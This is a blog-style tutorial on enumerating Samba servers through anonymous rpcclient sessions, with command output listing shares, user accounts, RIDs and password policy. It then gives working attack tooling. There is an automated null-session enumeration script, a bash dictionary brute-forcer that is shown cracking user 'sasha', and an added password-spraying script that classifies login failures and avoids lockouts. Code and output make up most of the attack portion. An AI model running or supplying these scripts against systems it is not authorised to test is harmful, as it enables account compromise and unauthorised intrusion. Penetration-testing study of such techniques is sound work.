Sunday, October 6, 2019

Enumerating Samba Servers with rpcclient

Connecting to the remote service

We can connect to the remote Samba service anonymously (a null session) by giving an empty username with -U "" together with the -N option, which tells rpcclient not to prompt for a password. Once connected you are dropped to a prompt much like the one in smbclient. rpcclient also lets you pass a single command on the command line with -c instead of working in the console, and that is how we will enumerate the remote service below.

root@asus:~% rpcclient -U "" -N 127.0.0.1
rpcclient $> 

Query Server Information

root@asus:~% rpcclient -U "" -N -c "srvinfo" 127.0.0.1
 ASUS           Wk Sv PrQ Unx NT SNT asus server (Samba, Ubuntu)
 platform_id     : 500
 os version      : 6.1
 server type     : 0x809a03
root@asus:~% 

Enumerate all shares

root@asus:~% rpcclient -U "" -N -c "netshareenumall" 127.0.0.1
netname: homes
 remark: Home Directories
 path: C:
 password: 
netname: print$
 remark: Printer Drivers
 path: C:\var\lib\samba\printers
 password: 
netname: share
 remark: 
 path: C:\home\sam\public_html\pub
 password: 
netname: IPC$
 remark: IPC Service (asus server (Samba, Ubuntu))
 path: C:\tmp
 password: 
root@asus:~% 

Get Share Information

root@asus:~% rpcclient -U "" -N -c "netsharegetinfo share 2" 127.0.0.1
netname: share
 remark: 
 path: C:\home\sam\public_html\pub
 password: 
root@asus:~% 

Display Account Information

root@asus:~% rpcclient -U "" -N -c "querydispinfo" 127.0.0.1
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: sam Name: sam Desc: 
index: 0x2 RID: 0x3ea acb: 0x00000010 Account: hayden Name: hayden sutton Desc: 
index: 0x3 RID: 0x3ec acb: 0x00000010 Account: sasha Name: sasha kim Desc: 
index: 0x4 RID: 0x3e9 acb: 0x00000010 Account: clare Name: clare chapman Desc: 
index: 0x5 RID: 0x3eb acb: 0x00000010 Account: jared Name: jared beck Desc: 
index: 0x6 RID: 0x3ed acb: 0x00000010 Account: vance Name: vance perkins Desc: 
root@asus:~% 

Enumerate Domain Users

root@asus:~% rpcclient -U "" -N -c "enumdomusers" 127.0.0.1
user:[sam] rid:[0x3e8]
user:[hayden] rid:[0x3ea]
user:[sasha] rid:[0x3ec]
user:[clare] rid:[0x3e9]
user:[jared] rid:[0x3eb]
user:[vance] rid:[0x3ed]
root@asus:~%

Get User Information

root@asus:~% rpcclient -U "" -N -c "queryuser 0x3ea" 127.0.0.1
 User Name   : hayden
 Full Name   : hayden sutton
 Home Drive  : \\asus\hayden
 Dir Drive   : 
 Profile Path: \\asus\hayden\profile
 Logon Script: 
 Description : 
 Workstations: 
 Comment     : 
 Remote Dial :
 Logon Time               : Wed, 31 Dec 1969 17:00:00 MST
 Logoff Time              : Wed, 06 Feb 2036 08:06:39 MST
 Kickoff Time             : Wed, 06 Feb 2036 08:06:39 MST
 Password last set Time   : Mon, 02 Sep 2019 12:29:46 MDT
 Password can change Time : Mon, 02 Sep 2019 12:29:46 MDT
 Password must change Time: Wed, 13 Sep 30828 20:48:05 MDT
 unknown_2[0..31]...
 user_rid : 0x3ea
 group_rid: 0x201
 acb_info : 0x00000010
 fields_present: 0x00ffffff
 logon_divs: 168
 bad_password_count: 0x00000000
 logon_count: 0x00000000
 padding1[0..7]...
 logon_hrs[0..21]...
root@asus:~%

Get Domain Information

root@asus:~% rpcclient -U "" -N -c "querydominfo" 127.0.0.1
Domain:  WORKGROUP
Server:  ASUS
Comment: asus server (Samba, Ubuntu)
Total Users: 6
Total Groups: 0
Total Aliases: 0
Sequence No: 1570400386
Force Logoff: -1
Domain Server State: 0x1
Server Role: ROLE_DOMAIN_PDC
Unknown 3: 0x1
root@asus:~% 

Enumerate Domains

root@asus:~% rpcclient -U "" -N -c "enumdomains" 127.0.0.1
name:[ASUS] idx:[0x0]
name:[Builtin] idx:[0x1]
root@asus:~% 

Get Password Policy Information

root@asus:~% rpcclient -U "" -N -c "getusrdompwinfo 0x3eb" 127.0.0.1
min_password_length: 5
    &info.password_properties: 0xe3266264 (3810943588)
           0: DOMAIN_PASSWORD_COMPLEX  
           0: DOMAIN_PASSWORD_NO_ANON_CHANGE
           1: DOMAIN_PASSWORD_NO_CLEAR_CHANGE
           0: DOMAIN_PASSWORD_LOCKOUT_ADMINS
           0: DOMAIN_PASSWORD_STORE_CLEARTEXT
           1: DOMAIN_REFUSE_PASSWORD_CHANGE

root@asus:~% 

These are just some of the commands available in rpcclient. It is worth entering the rpcclient console and typing 'help' for the full list of commands at your disposal.
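The commands above were run one at a time by hand. The following script is an added example, not code from the original post: it wraps the same null-session rpcclient calls in shell functions, parses the enumdomusers listing into name/RID pairs, and decodes the acb_info bitmask that querydispinfo and queryuser print (the flag values are the MS-SAMR account-control bits, so a decoded PWNOTREQ or DISABLED stands out immediately instead of hiding in a hex number). It assumes rpcclient is on PATH and that the target still accepts null sessions; the SAMPLE_ENUMDOMUSERS string is constructed from the post's own listing so the parsing can be checked offline.

```sh
#!/bin/sh
# Added example (not from the original post): wrap the null-session rpcclient
# commands shown above in functions, parse the enumdomusers listing, and decode
# the acb_info bitmask that querydispinfo/queryuser print.
# Assumptions: rpcclient is on PATH and the target accepts null sessions; the
# SAMPLE_* string is constructed from the post's own listing for offline checks.

# Run one rpcclient command as a null session (-U "" -N) against a host.
rpc() {                         # usage: rpc <host> "<command>"
    rpcclient -U "" -N -c "$2" "$1" 2>&1
}

# Turn lines such as   user:[sam] rid:[0x3e8]   into   sam 0x3e8
parse_enumdomusers() {          # reads rpcclient output on stdin
    sed -n 's/^user:\[\([^]]*\)\] rid:\[\([^]]*\)\]$/\1 \2/p'
}

# Decode acb_info (MS-SAMR account-control bits) into flag names.
# 0x0010 NORMAL is the plain user account seen throughout the post; PWNOTREQ,
# DISABLED and AUTOLOCK are the ones worth spotting during an assessment.
decode_acb() {                  # usage: decode_acb 0x00000010
    flags=$(( $1 )); names=""
    for pair in 0x0001:DISABLED 0x0002:HOMDIRREQ 0x0004:PWNOTREQ \
                0x0008:TEMPDUP 0x0010:NORMAL 0x0020:MNS 0x0040:DOMTRUST \
                0x0080:WSTRUST 0x0100:SVRTRUST 0x0200:PWNOEXP 0x0400:AUTOLOCK; do
        if [ $(( flags & ${pair%%:*} )) -ne 0 ]; then
            names="$names ${pair#*:}"
        fi
    done
    printf '%s\n' "${names# }"
}

# Pull the acb_info value out of a queryuser listing.
acb_from_queryuser() {          # reads queryuser output on stdin
    sed -n 's/^ *acb_info *: *\(0x[0-9a-fA-F]*\).*/\1/p'
}

# Full sweep of a live host: server, shares, domain, then one line per user.
enumerate_host() {              # usage: enumerate_host <host>
    host=$1
    for cmd in srvinfo netshareenumall querydominfo enumdomains; do
        echo "### $cmd"
        rpc "$host" "$cmd"
    done
    echo "### users (name rid flags)"
    rpc "$host" enumdomusers | parse_enumdomusers | while read -r user rid; do
        acb=$(rpc "$host" "queryuser $rid" | acb_from_queryuser)
        printf '%-10s %-6s %s\n' "$user" "$rid" "$(decode_acb "${acb:-0}")"
    done
}

# Constructed sample, copied from the post's enumdomusers listing, for offline checks.
SAMPLE_ENUMDOMUSERS='user:[sam] rid:[0x3e8]
user:[hayden] rid:[0x3ea]
user:[sasha] rid:[0x3ec]'

# Usage: ./enum.sh <host>
if [ $# -ge 1 ]; then
    enumerate_host "$1"
fi
```

Run it with the target as the only argument. Every account in the post decodes to NORMAL (0x00000010); on a real engagement the interesting lines are those carrying PWNOTREQ (logon allowed with an empty password) or DISABLED, and a value of 0x0211 decodes to DISABLED NORMAL PWNOEXP, which is the common shape of a stale but never-expiring account.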

Brute Force with rpcclient

Here is a way to brute force Samba passwords using the rpcclient utility and bash. Each attempt is a real authentication against the server, so check the domain's lockout policy before running it: every failed attempt counts against the account and is logged on the server.

#!/usr/bin/env bash
##
## Dictionary password attack against a valid samba username using rpcclient
##

user="sasha"
host="127.0.0.1"
list="users.txt"          # one candidate password per line

# Read the wordlist one line per entry (keeps passwords that contain spaces).
mapfile -t wordlist < "${list}"

echo "[*] Searching for the password for [${user}]..."

for word in "${wordlist[@]}"
do
    # A successful bind exits 0; "quit" simply closes the session again.
    rpcclient -U "${user}%${word}" -c "quit" "${host}" >/dev/null 2>&1

    if [ $? -eq 0 ]
    then
        echo "[+] Password \`${word}\` found for [${user}]"
        break
    fi
done

If we run the script...

root@asus:~% ./rpcclient.sh 
[*] Searching for the password for [sasha]...
[+] Password `master` found for [sasha]
root@asus:~% 
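The script above runs many passwords against one account, which is exactly the pattern a lockout policy punishes, and it only reports success, so a locked or disabled account looks the same as a wrong guess. The following script is an added example, not code from the original post: it sprays one candidate password across the users enumerated earlier (each account is touched once per run), classifies every failure by the NT_STATUS code rpcclient reports, and stops the moment a lockout is observed. It assumes rpcclient is on PATH and that on failure it prints a line of the form "Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE", which is the format current Samba releases use; the user list is the one from the enumdomusers output above, and the sample outputs in the checks are constructed.

```sh
#!/bin/sh
# Added example (not from the original post): spray one candidate password
# across the users enumerated earlier and classify every failure by the
# NT_STATUS code rpcclient reports, stopping at the first lockout.
# Assumptions: rpcclient is on PATH; on failure it prints a line of the form
#   Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
# (the format current Samba releases use); the user list below is the one
# enumerated in the post, and the sample outputs used for checks are constructed.

# Map an rpcclient exit status plus its output to a one-word verdict.
classify_login() {              # usage: classify_login <exit-status> "<output>"
    rc=$1; output=$2
    if [ "$rc" -eq 0 ]; then
        echo valid; return 0
    fi
    case "$output" in
        *NT_STATUS_LOGON_FAILURE*)        echo bad-password ;;
        *NT_STATUS_ACCOUNT_LOCKED_OUT*)   echo locked ;;
        *NT_STATUS_ACCOUNT_DISABLED*)     echo disabled ;;
        *NT_STATUS_PASSWORD_EXPIRED*|*NT_STATUS_PASSWORD_MUST_CHANGE*)
            echo valid-expired ;;         # right password, but it must be changed
        *NT_STATUS_*)                     # anything else: surface the code itself
            echo "other:$(printf '%s\n' "$output" | sed -n 's/.*\(NT_STATUS_[A-Z0-9_]*\).*/\1/p' | head -n 1)" ;;
        *)                                echo no-status ;;
    esac
}

# One authentication attempt; prints the verdict for the user/password pair.
try_login() {                   # usage: try_login <host> <user> <password>
    rc=0
    out=$(rpcclient -U "$2%$3" -c quit "$1" 2>&1) || rc=$?
    classify_login "$rc" "$out"
}

# One password against every user. A spray touches each account once, so it
# stays under typical lockout thresholds; if a lockout shows up anyway, stop.
spray() {                       # usage: spray <host> <password> <user>...
    host=$1; pass=$2; shift 2
    for user in "$@"; do
        verdict=$(try_login "$host" "$user" "$pass")
        printf '%-10s %s\n' "$user" "$verdict"
        if [ "$verdict" = locked ]; then
            echo "[!] lockout observed, stopping the spray" >&2
            return 1
        fi
    done
    return 0
}

# Usage: ./spray.sh <host> <password>   (users taken from the enumdomusers output above)
if [ $# -ge 2 ]; then
    spray "$1" "$2" sam hayden sasha clare jared vance
fi
```

A verdict of valid-expired is still a found credential: the password is correct and the server is only refusing the session until it is changed. The other: bucket keeps unexpected codes (connection refused, timeouts) visible instead of silently counting them as wrong guesses.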
